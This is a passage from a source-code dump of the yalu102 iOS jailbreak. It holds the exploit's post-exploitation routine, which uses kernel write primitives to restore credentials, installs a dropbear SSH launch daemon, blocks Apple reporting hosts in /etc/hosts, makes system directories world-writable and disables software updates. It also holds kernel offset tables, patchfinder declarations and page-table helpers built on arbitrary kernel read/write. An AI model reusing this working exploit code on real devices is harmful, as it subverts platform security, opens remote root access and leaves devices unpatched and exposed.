jl, 0, 0, (char**)&(const char*[]){jl, "--preserve-permissions", "--no-overwrite-dir", "-xvf", [bootstrap UTF8String], NULL}, NULL); 869 | NSLog(@"pid = %x", pd); 870 | waitpid(pd, 0, 0); 871 | 872 | 873 | NSString* jlaunchctl = [execpath stringByAppendingPathComponent:@"launchctl"]; 874 | jl = [jlaunchctl UTF8String]; 875 | 876 | copyfile(jl, "/bin/launchctl", 0, COPYFILE_ALL); 877 | chmod("/bin/launchctl", 0755); 878 | 879 | open("/.installed_yaluX", O_RDWR|O_CREAT); 880 | open("/.cydia_no_stash",O_RDWR|O_CREAT); 881 | 882 | 883 | system("echo '127.0.0.1 iphonesubmissions.apple.com' >> /etc/hosts"); 884 | system("echo '127.0.0.1 radarsubmissions.apple.com' >> /etc/hosts"); 885 | 886 | system("/usr/bin/uicache"); 887 | 888 | system("killall -SIGSTOP cfprefsd"); 889 | NSMutableDictionary* md = [[NSMutableDictionary alloc] initWithContentsOfFile:@"/var/mobile/Library/Preferences/com.apple.springboard.plist"]; 890 | 891 | [md setObject:[NSNumber numberWithBool:YES] forKey:@"SBShowNonDefaultSystemApps"]; 892 | 893 | [md writeToFile:@"/var/mobile/Library/Preferences/com.apple.springboard.plist" atomically:YES]; 894 | system("killall -9 cfprefsd"); 895 | 896 | } 897 | { 898 | NSString* jlaunchctl = [execpath stringByAppendingPathComponent:@"reload"]; 899 | char* jl = [jlaunchctl UTF8String]; 900 | unlink("/usr/libexec/reload"); 901 | copyfile(jl, "/usr/libexec/reload", 0, COPYFILE_ALL); 902 | chmod("/usr/libexec/reload", 0755); 903 | chown("/usr/libexec/reload", 0, 0); 904 | 905 | } 906 | { 907 | NSString* jlaunchctl = [execpath stringByAppendingPathComponent:@"0.reload.plist"]; 908 | char* jl = [jlaunchctl UTF8String]; 909 | unlink("/Library/LaunchDaemons/0.reload.plist"); 910 | copyfile(jl, "/Library/LaunchDaemons/0.reload.plist", 0, COPYFILE_ALL); 911 | chmod("/Library/LaunchDaemons/0.reload.plist", 0644); 912 | chown("/Library/LaunchDaemons/0.reload.plist", 0, 0); 913 | } 914 | { 915 | NSString* jlaunchctl = [execpath stringByAppendingPathComponent:@"dropbear.plist"]; 916 | char* jl = [jlaunchctl UTF8String]; 917 | unlink("/Library/LaunchDaemons/dropbear.plist"); 918 | copyfile(jl, "/Library/LaunchDaemons/dropbear.plist", 0, COPYFILE_ALL); 919 | chmod("/Library/LaunchDaemons/dropbear.plist", 0644); 920 | chown("/Library/LaunchDaemons/dropbear.plist", 0, 0); 921 | } 922 | unlink("/System/Library/LaunchDaemons/com.apple.mobile.softwareupdated.plist"); 923 | 924 | } 925 | } 926 | chmod("/private", 0777); 927 | chmod("/private/var", 0777); 928 | chmod("/private/var/mobile", 0777); 929 | chmod("/private/var/mobile/Library", 0777); 930 | chmod("/private/var/mobile/Library/Preferences", 0777); 931 | system("rm -rf /var/MobileAsset/Assets/com_apple_MobileAsset_SoftwareUpdate; touch /var/MobileAsset/Assets/com_apple_MobileAsset_SoftwareUpdate; chmod 000 /var/MobileAsset/Assets/com_apple_MobileAsset_SoftwareUpdate; chown 0:0 /var/MobileAsset/Assets/com_apple_MobileAsset_SoftwareUpdate"); 932 | system("(echo 'really jailbroken'; /bin/launchctl load /Library/LaunchDaemons/0.reload.plist)&"); 933 | WriteAnywhere64(bsd_task+0x100, orig_cred); 934 | sleep(2); 935 | 936 | NSLog(@"done"); 937 | } 938 | -------------------------------------------------------------------------------- /yalu102/launchctl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kpwn/yalu102/11ed504bad945f95b4372469dcf9e7e43a938aac/yalu102/launchctl -------------------------------------------------------------------------------- /yalu102/main.m: -------------------------------------------------------------------------------- 1 | // 2 | // main.m 3 | // yalu102 4 | // 5 | // Created by qwertyoruiop on 05/01/2017. 6 | // Copyright © 2017 kimjongcracks. All rights reserved. 7 | // 8 | 9 | #import 10 | #import "AppDelegate.h" 11 | 12 | int main(int argc, char * argv[]) { 13 | @autoreleasepool { 14 | return UIApplicationMain(argc, argv, nil, NSStringFromClass([AppDelegate class])); 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /yalu102/offsets.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #include "offsets.h" 7 | 8 | uint64_t allproc_offset; 9 | uint64_t kernproc_offset; 10 | uint64_t procoff; 11 | uint64_t rootvnode_offset; 12 | 13 | void init_offsets() { 14 | struct utsname u = { 0 }; 15 | uname(&u); 16 | 17 | printf("sysname: %s\n", u.sysname); 18 | printf("nodename: %s\n", u.nodename); 19 | printf("release: %s\n", u.release); 20 | printf("version: %s\n", u.version); 21 | printf("machine: %s\n", u.machine); 22 | 23 | allproc_offset = 0x5a4148; 24 | procoff = 0x360; 25 | rootvnode_offset = 0x5aa0b8; 26 | 27 | /* 28 | Offsets shared by: 29 | - @qwertyoruiop 30 | - @Mila432 31 | - @Andywiik 32 | - @nicogibbons 33 | - @jtv7 34 | - @onchehuh 35 | */ 36 | 37 | if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:09 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T7001") == 0) { 38 | allproc_offset = 0x5b8528; 39 | rootvnode_offset = 0x5be0b8; 40 | } 41 | else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:08 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T7000") == 0) { 42 | allproc_offset = 0x5b8468; 43 | rootvnode_offset = 0x5be0b8; 44 | } 45 | else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:09 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_S8000") == 0) { 46 | allproc_offset = 0x5a8438; 47 | rootvnode_offset = 0x5ae0b8; 48 | } 49 | else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:09 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_S5L8960X") == 0) { 50 | allproc_offset = 0x5ac418; 51 | rootvnode_offset = 0x5b20b8; 52 | } 53 | else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:08 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T8010") == 0) { 54 | allproc_offset = 0x5ec478; 55 | rootvnode_offset = 0x5f20b8; 56 | } 57 | else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Mon Dec 19 19:56:48 PST 2016; root:xnu-3789.43.2~1/RELEASE_ARM64_T7000") == 0) { 58 | allproc_offset = 0x5b8468; 59 | rootvnode_offset = 0x5be0b8; 60 | }//apple tv 4 61 | else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 20:25:47 PST 2016; root:xnu-3789.33.1~1/RELEASE_ARM64_T7000") == 0) { 62 | allproc_offset = 0x5b8468; 63 | rootvnode_offset = 0x5be0b8; 64 | }//apple tv 4 65 | else if (strcmp(u.version, "Darwin Kernel Version 16.1.0: Thu Sep 29 22:13:19 PDT 2016; root:xnu-3789.23.3~2/RELEASE_ARM64_T7000") == 0) { 66 | allproc_offset = 0x5b4168; 67 | rootvnode_offset = 0x5ba0b8; 68 | }//apple tv 4 69 | else if (strcmp(u.version, "Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:10 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_T8010") == 0) { 70 | allproc_offset = 0x5ec178; 71 | rootvnode_offset = 0x5f20b8; 72 | } 73 | else if (strcmp(u.version, "Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:12 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_T7001") == 0) { 74 | allproc_offset = 0x5b4228; 75 | rootvnode_offset = 0x5ba0b8; 76 | } 77 | else if (strcmp(u.version, "Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:11 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_T7000") == 0) { 78 | allproc_offset = 0x5b4168; 79 | rootvnode_offset = 0x5ba0b8; 80 | } 81 | else if (strcmp(u.version, "Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:12 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_S8000") == 0) { 82 | allproc_offset = 0x5a4148; 83 | rootvnode_offset = 0x5aa0b8; 84 | } 85 | else if (strcmp(u.version, "Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:11 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_S5L8960X") == 0) { 86 | allproc_offset = 0x5a4128; 87 | rootvnode_offset = 0x5aa0b8; 88 | } 89 | else if (strcmp(u.version, "Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:54 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_T8010") == 0) { 90 | allproc_offset = 0x5ec178; 91 | rootvnode_offset = 0x5f20b8; 92 | } 93 | else if (strcmp(u.version, "Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:54 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_T7001") == 0) { 94 | allproc_offset = 0x5b0228; 95 | rootvnode_offset = 0x5b60b8; 96 | } 97 | else if (strcmp(u.version, "Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:55 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_T7000") == 0) { 98 | allproc_offset = 0x5b0168; 99 | rootvnode_offset = 0x5b60b8; 100 | } 101 | else if (strcmp(u.version, "Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:54 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_S8000") == 0) { 102 | allproc_offset = 0x5a4148; 103 | rootvnode_offset = 0x5aa0b8; 104 | } 105 | else if (strcmp(u.version, "Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:55 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_S5L8960X") == 0) { 106 | allproc_offset = 0x5a4128; 107 | rootvnode_offset = 0x5aa0b8; 108 | } 109 | else if (strcmp(u.version, "Darwin Kernel Version 16.0.0: Fri Aug 5 22:15:30 PDT 2016; root:xnu-3789.1.24~11/RELEASE_ARM64_S5L8960X") == 0) { 110 | allproc_offset = 0x5a4128; 111 | rootvnode_offset = 0x5aa0b8; 112 | }//some beta ios 113 | else { 114 | printf("missing offset, prob crashing\n"); 115 | } 116 | } -------------------------------------------------------------------------------- /yalu102/offsets.h: -------------------------------------------------------------------------------- 1 | #ifndef offsets_h 2 | #define offsets_h 3 | 4 | #import 5 | 6 | // offsets from the main kernel 0xfeedfacf 7 | extern uint64_t allproc_offset; 8 | extern uint64_t kernproc_offset; 9 | 10 | // offsets in struct proc 11 | extern uint64_t struct_proc_p_pid_offset; 12 | extern uint64_t struct_proc_task_offset; 13 | extern uint64_t struct_proc_p_uthlist_offset; 14 | extern uint64_t struct_proc_p_ucred_offset; 15 | extern uint64_t struct_proc_p_comm_offset; 16 | 17 | // offsets in struct kauth_cred 18 | extern uint64_t struct_kauth_cred_cr_ref_offset; 19 | 20 | // offsets in struct uthread 21 | extern uint64_t struct_uthread_uu_ucred_offset; 22 | extern uint64_t struct_uthread_uu_list_offset; 23 | 24 | // offsets in struct task 25 | extern uint64_t struct_task_ref_count_offset; 26 | extern uint64_t struct_task_itk_space_offset; 27 | 28 | // offsets in struct ipc_space 29 | extern uint64_t struct_ipc_space_is_table_offset; 30 | 31 | // offsets in struct ipc_port 32 | extern uint64_t struct_ipc_port_ip_kobject_offset; 33 | 34 | void init_offsets(); 35 | extern uint64_t rootvnode_offset; 36 | 37 | #endif 38 | -------------------------------------------------------------------------------- /yalu102/patchfinder64.h: -------------------------------------------------------------------------------- 1 | // 2 | // patchfinder64.h 3 | // 4 | // Created by qwertyoruiop on 21/09/16. 5 | // Copyright © 2016 qwertyoruiop. All rights reserved. 6 | // 7 | 8 | #ifndef patchfinder64_h 9 | #define patchfinder64_h 10 | 11 | #import 12 | 13 | extern uint64_t text_exec_base; 14 | extern uint64_t text_exec_size; 15 | 16 | extern uint64_t prelink_exec_base; 17 | extern uint64_t prelink_exec_size; 18 | 19 | extern uint64_t whole_base; 20 | extern uint64_t whole_size; 21 | extern uint8_t* whole_dump; 22 | extern uint64_t find_register_value(uint32_t* opcodes, uint64_t offset, uint64_t opcode_base, uint8_t reg); 23 | extern uint64_t find_reference(uint32_t* opcodes, size_t opcode_size, uint64_t opcode_base, uint64_t target); 24 | enum Search { 25 | SearchTextExec, 26 | SearchPrelinkExec 27 | }; 28 | extern char uref; 29 | extern uint64_t get_data_for_mode(uint64_t offset, enum Search mode); 30 | 31 | 32 | 33 | void set_text_exec(uint64_t text_exec_base_,uint64_t text_exec_size_); 34 | void set_prelink_exec(uint64_t prelink_exec_base_, uint64_t prelink_exec_size_); 35 | void set_dump(uint64_t whole_base_,uint64_t whole_size_, uint8_t* whole_dump_); 36 | uint64_t find_kernel_pmap(); 37 | uint64_t find_gPhysBase(); 38 | uint64_t find_flushcache(); 39 | uint64_t find_amfi_memcmpstub(); 40 | uint64_t find_memwithphys(); 41 | uint64_t find_kernel_mount(); 42 | uint64_t find_vnode_lookup(); 43 | uint64_t find_cpu_list(); 44 | uint64_t find_cpacr_write(); 45 | uint64_t find_lwvm_mapio_patch(); 46 | uint64_t find_lwvm_mapio_newj(); 47 | uint64_t find_ret_non0(); 48 | uint64_t find_ret_0(); 49 | uint64_t find_amfiret(); 50 | uint64_t find_sbops(); 51 | #define CS_VALID 0x0000001 /* dynamically valid */ 52 | #define CS_ADHOC 0x0000002 /* ad hoc signed */ 53 | #define CS_GET_TASK_ALLOW 0x0000004 /* has get-task-allow entitlement */ 54 | #define CS_INSTALLER 0x0000008 /* has installer entitlement */ 55 | 56 | #define CS_HARD 0x0000100 /* don't load invalid pages */ 57 | #define CS_KILL 0x0000200 /* kill process if it becomes invalid */ 58 | #define CS_CHECK_EXPIRATION 0x0000400 /* force expiration checking */ 59 | #define CS_RESTRICT 0x0000800 /* tell dyld to treat restricted */ 60 | #define CS_ENFORCEMENT 0x0001000 /* require enforcement */ 61 | #define CS_REQUIRE_LV 0x0002000 /* require library validation */ 62 | #define CS_ENTITLEMENTS_VALIDATED 0x0004000 63 | 64 | #define CS_ALLOWED_MACHO 0x00ffffe 65 | 66 | #define CS_EXEC_SET_HARD 0x0100000 /* set CS_HARD on any exec'ed process */ 67 | #define CS_EXEC_SET_KILL 0x0200000 /* set CS_KILL on any exec'ed process */ 68 | #define CS_EXEC_SET_ENFORCEMENT 0x0400000 /* set CS_ENFORCEMENT on any exec'ed process */ 69 | #define CS_EXEC_SET_INSTALLER 0x0800000 /* set CS_INSTALLER on any exec'ed process */ 70 | 71 | #define CS_KILLED 0x1000000 /* was killed by kernel for invalidity */ 72 | #define CS_DYLD_PLATFORM 0x2000000 /* dyld used to load this is a platform binary */ 73 | #define CS_PLATFORM_BINARY 0x4000000 /* this is a platform binary */ 74 | #define CS_PLATFORM_PATH 0x8000000 /* platform binary by the fact of path (osx only) */ 75 | #endif /* patchfinder64_h */ 76 | -------------------------------------------------------------------------------- /yalu102/patchfinder64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kpwn/yalu102/11ed504bad945f95b4372469dcf9e7e43a938aac/yalu102/patchfinder64.o -------------------------------------------------------------------------------- /yalu102/pte_stuff.h: -------------------------------------------------------------------------------- 1 | #ifndef pte_stuff_h 2 | #define pte_stuff_h 3 | 4 | 5 | #define TTE_INDEX_SHIFT 3 6 | #define TTE_SIZE (1 << TTE_INDEX_SHIFT) 7 | #define TTE_INDEX(vma, level) ((vma.vm_info.level ## _index) << TTE_INDEX_SHIFT) 8 | #define TTE_GET(tte, mask) (tte & mask) 9 | #define TTE_SETB(tte, mask) tte = tte | mask 10 | #define TTE_SET(tte, mask, val) tte = ((tte & (~mask)) | (val & mask)) 11 | #define TTE_IS_VALID_MASK 0x1 12 | #define TTE_IS_TABLE_MASK 0x2 13 | #define TTE_BLOCK_ATTR_INDEX_MASK 0x1C 14 | #define TTE_BLOCK_ATTR_NS_MASK 0x20 15 | #define TTE_BLOCK_ATTR_AP_MASK 0xC0 16 | #define TTE_BLOCK_ATTR_AP_RO_MASK 0x80 17 | #define TTE_BLOCK_ATTR_AP_CAN_EL0_ACCESS_MASK 0x40 18 | #define TTE_BLOCK_ATTR_SH_MASK 0x300 19 | #define TTE_BLOCK_ATTR_AF_MASK 0x400 20 | #define TTE_BLOCK_ATTR_NG_MASK 0x800 21 | #define TTE_PHYS_VALUE_MASK 0xFFFFFFFFF000ULL 22 | #define TTE_BLOCK_ATTR_CONTIG_MASK (1ULL << 52) 23 | #define TTE_BLOCK_ATTR_PXN_MASK (1ULL << 53) 24 | #define TTE_BLOCK_ATTR_UXN_MASK (1ULL << 54) 25 | #define VIRT_TO_PHYS(vaddr) (vaddr - gVirtBase + gPhysBase) 26 | #define PHYS_TO_VIRT(paddr) (paddr - gPhysBase + gVirtBase) 27 | uint64_t gPhysBase,gVirtBase,pmap_store,level1_table,hibit_guess; 28 | 29 | typedef union VMA_4K { 30 | struct { 31 | uint64_t block_off : 12; 32 | uint64_t level3_index : 9; 33 | uint64_t level2_index : 9; 34 | uint64_t level1_index : 9; 35 | uint64_t level0_index : 9; 36 | uint64_t ttbr_selector : 16; 37 | } __attribute__((packed)) vm_info; 38 | uint64_t vmaddr; 39 | } VMA_4K; 40 | typedef union VMA_16K { 41 | struct { 42 | uint64_t block_off : 14; 43 | uint64_t level3_index : 11; 44 | uint64_t level2_index : 11; 45 | uint64_t level1_index : 11; 46 | uint64_t level0_index : 1; 47 | uint64_t ttbr_selector : 16; 48 | } __attribute__((packed)) vm_info; 49 | uint64_t vmaddr; 50 | } VMA_16K; 51 | 52 | VMA_16K vad16; 53 | VMA_4K vad4; 54 | char isvad = 0; 55 | 56 | #define TTELog NSLog 57 | vm_size_t sz = 0; 58 | 59 | void checkvad() { 60 | if (!sz) { 61 | struct utsname u = { 0 }; 62 | uname(&u); 63 | host_page_size(mach_host_self(), &sz); 64 | NSLog(@"checkvad: %x %x", sz, getpagesize()); 65 | if (strstr(u.machine, "iPad5,") == u.machine) { 66 | sz = 4096; // this is 4k but host_page_size lies to us 67 | } 68 | assert(sz); 69 | if (sz == 4096) { 70 | isvad = 1; 71 | } 72 | } 73 | } 74 | void parse_block_tte(uint64_t tte) { 75 | TTELog(@"TTE physaddr: %016llx", TTE_GET(tte, TTE_PHYS_VALUE_MASK)); 76 | TTELog(@"TTE table: %d", !!(TTE_GET(tte, TTE_IS_TABLE_MASK))); 77 | TTELog(@"TTE valid: %d", !!(TTE_GET(tte, TTE_IS_VALID_MASK))); 78 | TTELog(@"TTE userland eXecute Never: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_UXN_MASK))); 79 | TTELog(@"TTE privileged eXecute Never: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_PXN_MASK))); 80 | TTELog(@"TTE contiguous: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_CONTIG_MASK))); 81 | TTELog(@"TTE not global: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_NG_MASK))); 82 | TTELog(@"TTE access flag: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_AF_MASK))); 83 | TTELog(@"TTE shareable: %01llx", (TTE_GET(tte, TTE_BLOCK_ATTR_SH_MASK) >> 8)); 84 | TTELog(@"TTE access permissions: %s", (TTE_GET(tte, TTE_BLOCK_ATTR_AP_RO_MASK)) ? "Read only" : "Read/Write"); 85 | TTELog(@"TTE access permissions: %s", (TTE_GET(tte, TTE_BLOCK_ATTR_AP_CAN_EL0_ACCESS_MASK)) ? "EL0 (Userland) can access this page" : "EL0 (Userland) cannot access this page"); 86 | } 87 | 88 | void pagestuff_64(vm_address_t vmaddr, void (^pagestuff_64_callback)(vm_address_t tte_addr, int addr), vm_address_t table, int level) { 89 | 90 | checkvad(); 91 | if (!table) table = level1_table; 92 | if (!level) level = 1; 93 | 94 | vm_address_t tteaddr = 0; 95 | 96 | 97 | 98 | if (sz == 4096) { 99 | VMA_4K target_addr; 100 | target_addr.vmaddr = vmaddr; 101 | 102 | if (level == 1) { 103 | target_addr.vm_info.level1_index -= 0x1c0; 104 | } 105 | 106 | switch (level) { 107 | case 0: 108 | tteaddr = table + TTE_INDEX(target_addr, level0); 109 | break; 110 | case 1: 111 | tteaddr = table + TTE_INDEX(target_addr, level1); 112 | break; 113 | 114 | case 2: 115 | tteaddr = table + TTE_INDEX(target_addr, level2); 116 | break; 117 | 118 | case 3: 119 | tteaddr = table + TTE_INDEX(target_addr, level3); 120 | break; 121 | 122 | default: 123 | break; 124 | } 125 | 126 | } else if (sz == 4096*4) { 127 | VMA_16K target_addr; 128 | target_addr.vmaddr = vmaddr; 129 | 130 | switch (level) { 131 | case 0: 132 | tteaddr = table + TTE_INDEX(target_addr, level0); 133 | break; 134 | case 1: 135 | tteaddr = table + TTE_INDEX(target_addr, level1); 136 | break; 137 | 138 | case 2: 139 | tteaddr = table + TTE_INDEX(target_addr, level2); 140 | break; 141 | 142 | case 3: 143 | tteaddr = table + TTE_INDEX(target_addr, level3); 144 | break; 145 | 146 | default: 147 | break; 148 | } 149 | 150 | 151 | } 152 | 153 | //parse_block_tte(level1_entry); 154 | 155 | pagestuff_64_callback(tteaddr, level); 156 | 157 | uint64_t level1_entry = ReadAnywhere64(tteaddr); 158 | 159 | if (TTE_GET(level1_entry, TTE_IS_TABLE_MASK) && level != 3) { 160 | pagestuff_64(vmaddr, pagestuff_64_callback, (TTE_GET(level1_entry, TTE_PHYS_VALUE_MASK)) - gPhysBase + gVirtBase, level + 1); 161 | } 162 | } 163 | 164 | uint64_t findphys_real(uint64_t virtaddr) { 165 | __block uint64_t physvar = 0; 166 | pagestuff_64(virtaddr, ^(vm_address_t tte_addr, int addr) { 167 | uint64_t tte = ReadAnywhere64(tte_addr); 168 | if (addr == 3) {\ 169 | physvar = TTE_GET(tte, TTE_PHYS_VALUE_MASK); 170 | } 171 | }, level1_table, isvad ? 1 : 2); 172 | 173 | return physvar; 174 | 175 | } 176 | uint64_t physalloc(uint64_t size) { 177 | uint64_t ret = 0; 178 | mach_vm_allocate(tfp0, (mach_vm_address_t*) &ret, size, VM_FLAGS_ANYWHERE); 179 | return ret; 180 | } 181 | 182 | #endif 183 | -------------------------------------------------------------------------------- /yalu102/reload: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | ls /etc/rc.d | while read a; do /etc/rc.d/$a; done 3 | sleep 1 4 | launchctl unload $(ls /System/Library/LaunchDaemons/ | grep -v logd | grep -v fud | grep -v ReportCrash | while read a; do printf /System/Library/LaunchDaemons/$a\ ; done) 5 | launchctl unload /System/Library/NanoLaunchDaemons 6 | sleep 1 7 | launchctl load /Library/LaunchDaemons 8 | launchctl load /System/Library/LaunchDaemons 9 | launchctl load /System/Library/NanoLaunchDaemons 10 | 11 | exit 0 12 | -------------------------------------------------------------------------------- /yalu102/tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kpwn/yalu102/11ed504bad945f95b4372469dcf9e7e43a938aac/yalu102/tar --------------------------------------------------------------------------------